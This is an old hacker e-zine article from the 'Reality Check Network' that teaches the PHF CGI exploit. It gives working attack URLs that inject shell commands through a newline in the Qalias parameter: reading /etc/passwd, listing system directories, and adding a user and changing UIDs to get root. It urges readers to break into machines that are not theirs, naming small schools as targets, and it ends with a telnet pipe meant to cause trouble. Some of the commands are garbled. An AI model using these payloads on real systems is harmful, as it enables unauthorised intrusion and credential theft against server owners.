home *** CD-ROM | disk | FTP | other *** search
- ª R E A L I T Y C H E C K N E T W O R K! ª_
- +----------------------------------------------------------------------------ª_
- ª ª
- ª From Issue #33 - PHF Web Hacking ª
- ª by Dagashi ª
- ª____________________________________________________________________________ª_
- ª____________________________________________________________________________ª_
- +----------------------------------------------------------------------------ª_
- ª ª_
- ª Alright there kiddies, it's time to lightly dive into the world of ª_
- ª how to obtain shells that do not rightfully belong to you and how to ª_
- ª generally piss off people on the Internet. As always, this is a well ª_
- ª known bit on information (because no one in their right mind would give ª_
- ª you an exploit to a system that no one else knows of), so I take no ª_
- ª responsibility for whatever you do with it. ª_
- ª ª_
- ª Since the majority of computers on the Internet are of UNIX decent, ª_
- ª I will be mainly talk about their problems and such. Now, the majority ª_
- ª of us know that UNIX is full of holes and other problems no matter what ª_
- ª revisions and patches are made, so this might not come as a big surprise ª
- ª when I tell you there is a common exploit that will run any program on ª
- ª your victim machine. It is the PHF hack. Though it is no big deal to ª
- ª the majority of ISP's, most little companies do not have the time or ª
- ª money to deal with all the problems of their operating systems. Small ª
- ª schools that are NOT technologically oriented, like high schools with ª
- ª T1's and such would be a good example. And so, this will work on some ª
- ª of them. ª
- ª ª
- ª All that is required to be done is to put this into the URL of ª
- ª Netscape: ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ª
- ª ª
- ª and you have a listing of the passwd file to use or abuse. But the ª
- ª PHF exploit can do more then just that (for those of you who will be ª
- ª flaming me for writing such a simple article). It can access any type ª
- ª of program that is on the opposing computer and run it. ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ ª
- ª ª
- ª will give you the directory listing of everything from the root of ª
- ª the system. From there, you can just alter it accordingly to have a ª
- ª peek around the system to see what else you can learn. ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin ª
- ª ª
- ª would show you every command that is available in the bin dir. If ª
- ª you slightly modified it, you would also be able to see the permissions ª
- ª of the specific files. ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin ª
- ª ª
- ª which can come in handy since, well, seeing as how you have root ª
- ª permissions you now have a nice little bit of information about how the ª
- ª system functions can use that to get even more access or information out ª
- ª of it. ª
- ª ª
- ª Or the best one of them all: ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi ª
- ª %20dagashi%20100%20 ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 ª
- ª ª
- ª http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 ª
- ª ª
- ª Do that and you MIGHT have root access to the server by telnet. Be ª
- ª forewarned that this is an old hack and many servers would not have the ª
- ª PHF script still running or have chmoded it to 000. This can get you ª
- ª into a bunch of trouble, so be careful. As I said before, this is well ª
- ª known and I wouldn't give it out to you unless most system ª
- ª administrators (if they deserve the title then they know this hack by ª
- ª heart) knew it as well. But there are always those that don't deserve ª
- ª the honor of the name, and to those, you have my full consent to fuck up ª
- ª their machines to hell. ª
- ª ª
- ª For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 ª
- ª 25" in Linux and watch life become a ball. ª
- ª ª
- +----------------------------------------------------------------------------+
-